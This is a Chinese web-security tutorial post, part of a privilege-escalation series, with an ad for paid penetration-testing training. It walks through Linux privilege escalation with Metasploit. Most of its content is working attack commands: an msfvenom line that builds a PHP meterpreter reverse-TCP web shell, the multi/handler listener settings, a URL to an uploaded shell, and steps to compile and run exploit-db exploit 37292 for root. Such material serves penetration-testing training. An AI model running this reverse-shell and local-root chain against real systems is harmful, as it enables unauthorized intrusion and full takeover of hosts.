[原创]WEB安全第六章 提权篇16 metasploit linux提权
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
WEB安全第六章 提权篇16 metasploit linux提权
1、简介
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
2、使用metasploit linux提权
生成攻击载荷
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.134 LPORT=12345 -f raw > /var/www/html/shell.php
本地监听
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set lhost 192.168.0.134
set lport 12345
exploit
shel.php 的内容
![[原创]WEB安全第六章 提权篇16 metasploit linux提权](https://www.moonsec.com/wp-content/uploads/2019/11/image001-37-1024x512.png)
![[原创]WEB安全第六章 提权篇16 metasploit linux提权](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
反弹shell
http://www.moontester.com//upload/shellx.php
在metasploit设置好监听模块 访问shellx.php 就会获取一个session
![[原创]WEB安全第六章 提权篇16 metasploit linux提权](https://www.moonsec.com/wp-content/uploads/2019/11/image002-36-1024x540.png)
在metasploit 里面有的提权模块
![[原创]WEB安全第六章 提权篇16 metasploit linux提权](https://www.moonsec.com/wp-content/uploads/2019/11/image003-27.png)
3、提权命令
getuid 查看当前用户
shell 使用终端
https://www.exploit-db.com/exploits/37292
gcc 37292.c -o exp
chmod +x exp
./exp
如果成功就会得到一个root
![[原创]WEB安全第六章 提权篇16 metasploit linux提权](https://www.moonsec.com/wp-content/uploads/2019/11/image004-22.png)
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/489.html
mOon 